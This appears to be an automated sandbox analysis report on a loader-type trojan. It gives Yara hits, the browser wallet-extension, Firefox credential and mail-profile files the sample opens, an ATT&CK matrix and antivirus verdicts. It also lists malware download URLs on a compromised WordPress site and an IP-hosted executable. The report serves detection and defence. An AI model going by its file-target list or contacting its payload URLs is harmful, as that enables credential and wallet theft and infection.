Source: Yara match | File source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip, type: DROPPED
The "Sync Extension Settings" paths below are keyed by Chrome extension ID; the sample walks the LevelDB stores of browser extensions (nkbihfbeogaeaoehlefnkodbefgpgknn is MetaMask and hnfanknocfeofbddgcijnmhnfnkdnaad is Coinbase Wallet) alongside Firefox's formhistory.sqlite.
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\signons.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\signons.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENTJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR

                        Remote Access Functionality

Source: Yara match, File source: 0.3.file.exe.6454b80.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.file.exe.6454b80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.file.exe.6b70000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.file.exe.6b70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.file.exe.64909c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.file.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000003.2602349258.00000000064D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2602143972.0000000006419000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2602388516.0000000006454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2601984271.0000000006490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.3216150564.0000000006B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2602058976.0000000006B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.3214709406.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2094948429.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\_LQmmrlytjrHiMTfplY7yVS.zip, type: DROPPED
ATT&CK matrix, listed per tactic (the number in front of a technique is the count shown for it in the matrix; techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Native API; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Create Account; 1 Valid Accounts; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 1 Access Token Manipulation; 1 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 11 Virtualization/Sandbox Evasion; 1 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 2 File and Directory Discovery; 46 System Information Discovery; 1 Query Registry; 41 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Screen Capture; 1 Email Collection; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 4 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 63% | ReversingLabs | Win32.Trojan.Privateloader
file.exe | 58% | Virustotal | Browse
file.exe | 100% | Avira | HEUR/AGEN.1304046
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
easy2buy.ae | 4% | Virustotal | Browse
Source | Detection | Scanner | Label
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/ | 0% | Avira URL Cloud | safe
https://easy2buy.j$ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/upgrade/k.exeY | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/ | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.cs | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/upgrade/k.exe | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15. | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets | 100% | Avira URL Cloud | malware
https://easy2buy.ae:80/wp-content/upgrade/k.exe | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-admin/admin-ajax.php | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 | 0% | Avira URL Cloud | safe
https://easy2buy.ae:80/wp-content/upgrade/k.exe | 5% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-admin/admin-ajax.php | 4% | Virustotal | Browse
https://easy2buy.ae/property-management-and-letting/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.14.0 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/upgrade/k.exe | 0% | Virustotal | Browse
https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/contact/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png | 4% | Virustotal | Browse
https://easy2buy.ae/#/schema/logo/image/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/htmega-keyframes.css?ver=2.2 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve | 100% | Avira URL Cloud | malware
https://easy2buy.ae/services/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/feed/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/#/schema/logo/image/ | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/services/ | 4% | Virustotal | Browse
https://easy2buy.ae/xmlrpc.php?rsd | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg); | 100% | Avira URL Cloud | malware
https://easy2buy.ae:80/ntControlSet | 0% | Avira URL Cloud | safe
http://193.233.132.175/server/k/l2.exerCA | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg); | 4% | Virustotal | Browse
https://easy2buy.ae/xmlrpc.php?rsd | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/popper.min.js?ver=2.2.0 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/property-management-and-letting/ | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver= | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/2023/06/logo.png | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/css/newhome-core.min.css?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/feed/ | 4% | Virustotal | Browse
https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?ve | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/uploads/2023/06/logo.png | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3 | 4% | Virustotal | Browse
https://easy2buy.ae/contact/ | 4% | Virustotal | Browse
https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.cs | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full | 4% | Virustotal | Browse
https://easy2buy.ae/about/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/header-footer-elementor/inc/js/frontend.js?ver=1.6.14 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/arranging-residential-visa/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762 | 4% | Virustotal | Browse
https://easy2buy.ae | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-includes/js/jquery/jquery.min.js?ver=3.7.1 | 4% | Virustotal | Browse
https://easy2buy.ae/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.2 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/css/animation.css?ver=2.2.0 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-includes/js/hoverIntent.min.js?ver=1.10.2 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/htbbootstrap.js?ver=2.2.0 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js | 100% | Avira URL Cloud | malware
https://easy2buy.ae/investment-tax-and-accounting-advisory/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-json/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/comments/feed/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/general-guidance-on-living-in-dubai/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/upgrade/k.exexe | 100% | Avira URL Cloud | malware
https://easy2buy.ae/blog/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/resale-of-the-apartment/ | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme | 100% | Avira URL Cloud | malware
https://easy2buy.ae/#organization | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 | 0% | Avira URL Cloud | safe
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3 | 100% | Avira URL Cloud | malware
https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.186.192 | true | false | | high
easy2buy.ae | 185.199.220.53 | true | false | | unknown
db-ip.com | 172.67.75.166 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://easy2buy.ae/wp-content/upgrade/k.exe | false | 0% Virustotal (Browse); Avira URL Cloud: malware | unknown
https://db-ip.com/demo/home.php?s=81.181.60.11 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.dr | false | | high
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.dr | false | | high
https://easy2buy.ae/wp-content/plugins/ht-mega-for-elementor/assets/js/waypoints.js?ver=2.2.0 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown
https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | 4% Virustotal (Browse); Avira URL Cloud: malware | unknown
https://easy2buy.j$ | file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://easy2buy.ae/activities-related-to-the-purchase-of-real-estate/ | EdgeMS2.exe.0.dr | false | 4% Virustotal (Browse); Avira URL Cloud: safe | unknown
